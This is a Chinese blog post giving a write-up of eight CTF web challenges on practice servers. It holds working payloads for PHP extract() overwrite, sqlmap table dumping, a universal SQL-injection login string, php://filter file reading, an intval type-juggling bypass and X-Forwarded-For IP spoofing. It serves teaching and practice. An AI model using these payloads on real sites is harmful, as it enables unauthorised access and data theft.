20190423 CTF题-web

你的名字 2022-04-24 09:56 267阅读 0赞

签到题（代码审计-extract变量覆盖）

WEB1（SQL注入）

WEB2（万能语句登陆框）

WEB3（文件包含+php伪协议）

WEB4（脚本题）

WEB5（md5验证）

vim编辑器（备份文件+代码审计）

WEB7（伪造ip）

--------------------

# 签到题（代码审计-extract变量覆盖） #

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70][]

很明显是一道关于extract变量覆盖的代码审计题。

**需要满足下面两个条件：**

1.  利用extract传入空值覆盖$b和$a的值
2.  还要满足$a==$c

**Payload：**

http://123.206.31.85:10001/?b=&a=

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 1][]

得到flag。

--------------------

# WEB1（SQL注入） #

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 2][]

看到留言本很自然就想到SQL注入。

**抓包保存为txt文件，sqlmap跑：**

sqlmap.py -r 1.txt --current-db

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 3][]

sqlmap.py -r 1.txt -D web5 --tables

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 4][]

sqlmap.py -r 1.txt -D web5 -T flag --dump

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 5][]

--------------------

# WEB2（万能语句登陆框） #

![2019042308272313.png][]

一看就知道是sql注入题，用户名构造万能密码：'or '1' = '1' \#   密码任意  得到flag。

--------------------

# WEB3（文件包含+php伪协议） #

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 6][]

刚开始看到这道题的时候还以为是文件上传，但其实是**考察文件包含漏洞**\+**php伪协议**。

从url的 ?op=upload 其实就可以猜测出，只是把原本的file替换成了op。

**Payload：**

http://123.206.31.85:10003/?op=php://filter/read=convert.base64-encode/resource=flag

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 7][]

**base64解码：**

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 8][]

得到flag。

--------------------

# WEB4（脚本题） #

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 9][]

说到快就得写脚本了。

# -*- coding:utf-8 -*-
    import requests
    import re
    
    url = "http://123.206.31.85:10002/index.php"
    session = requests.session()
    r = session.post(url)
    html = r.text
    key = re.findall('(.*)</p>', html)
    for i in key:
        r2 = session.post('http://123.206.31.85:10002/index.php',data ={'result':eval(i)})
        print(r2.text)

运行得到flag。

![20190424004431390.png][]

--------------------

# WEB5（md5验证） #

根据页面title提示robots，访问**robots.txt**。

![20190424003328665.png][]

访问**shell.php**

![20190423214441582.png][]

<?php
    $a = 0;
    for($a; $a<100000000; $a++){
    	if(substr(md5($a),0,6) == '52aa16'){
    		echo $a;
    		exit();
    	}
    }
    ?>

执行后得到9288。

![2019042321460274.png][]

得到flag。

--------------------

# vim编辑器（备份文件+代码审计） #

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 10][]

根据提示，观察url发现这是1ndex.php，而不是index.php。

**抓包，修改为index.php，发现302跳转：**

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 11][]

根据这道题的名字猜测，既然是用vim写的或许会有临时文件，果然在**index.php~**找到了。

<?php
    header('content-type:text/html;charset=utf-8');
    include './flag.php';
    error_reporting(0);
    if(empty($_GET['id'])){
        header('location:./1ndex.php');
    }else{
    	$id = $_GET['id'];
    	if (!is_numeric($id)) {
    		$id = intval($id);
    		switch ($id) {
    			case $id>=0:
    				echo "快出去吧，走错路了～～～<br>";
    				echo "这么简单都不会么？";
    				break;
    			case $id>=10:
    				exit($flag);
    				break;
    			default:
    				echo "你走不到这一步的!";
    				break;
    		}
    	}
    }
    ?>

代码审计。

**Payload：**

http://123.206.31.85:10015/index.php?id="10a"

![20190423093837540.png][]

--------------------

# WEB7（伪造ip） #

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 12][]

进到页面后，查看一下源码。

**结果找到这个：**

![20190423090447696.png][]

**base64解码后：**

test123

**尝试登陆，提示ip禁止访问：**

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 13][]

猜测有可能需要本地访问，因此用火狐的 **X-Forwarded-For Header插件** 伪造127.0.0.1。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 14][]

得到flag。

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70]: /images/20220216/41df7360d4c24053a00a55b829a355c6.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 1]: /images/20220216/5119b93a7e9043b18b34257d6e704e12.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 2]: /images/20220216/be6affe44605445d8f7a56743577616b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 3]: /images/20220216/d48086c26ecf43d5b21ed296e1e7195a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 4]: /images/20220216/2dfc86e32f1d457fbfa450ffb9182cc5.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 5]: /images/20220216/6d432af141f94e0199367e0ef79dc03c.png
[2019042308272313.png]: /images/20220216/69405b2d8a6e47a598e9866c702df52a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 6]: /images/20220216/8890bbd5e0c94d24925cb65dad1a55c5.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 7]: /images/20220216/ce4a7cdb2b184d41a9225b234f83b54c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 8]: /images/20220216/83e74e23b47243808ac80e45c8ebfb26.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 9]: /images/20220216/781d42f1b03643cfb9c4c74b8b31a215.png
[20190424004431390.png]: /images/20220216/76f9ffb6fbbd4232a9a774a45f760232.png
[20190424003328665.png]: /images/20220216/bf6709387f794fbeb9711290527e8b1b.png
[20190423214441582.png]: /images/20220216/14fd367041e24583ae239bcd8ac1a37e.png
[2019042321460274.png]: /images/20220216/3c47c2d430f8445e9efe1ea5ca640eb8.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 10]: /images/20220216/dbe3913b5b224a88a46a701f5572b849.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 11]: /images/20220216/d4dc35b7a0c343d2b363cde533137924.png
[20190423093837540.png]: /images/20220216/e53dd332d24a41d9a6ebd43bb6b85fc1.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 12]: /images/20220216/13b1ff0c1ce248d79ad34a4d7daaabd3.png
[20190423090447696.png]: /images/20220216/48ff200990ed42c5b701084c4a1cbee6.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 13]: /images/20220216/c13add8332a24185a9d34672071a6d38.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 14]: /images/20220216/7f3e584d78144cdb964a7ca3ea2c41cf.png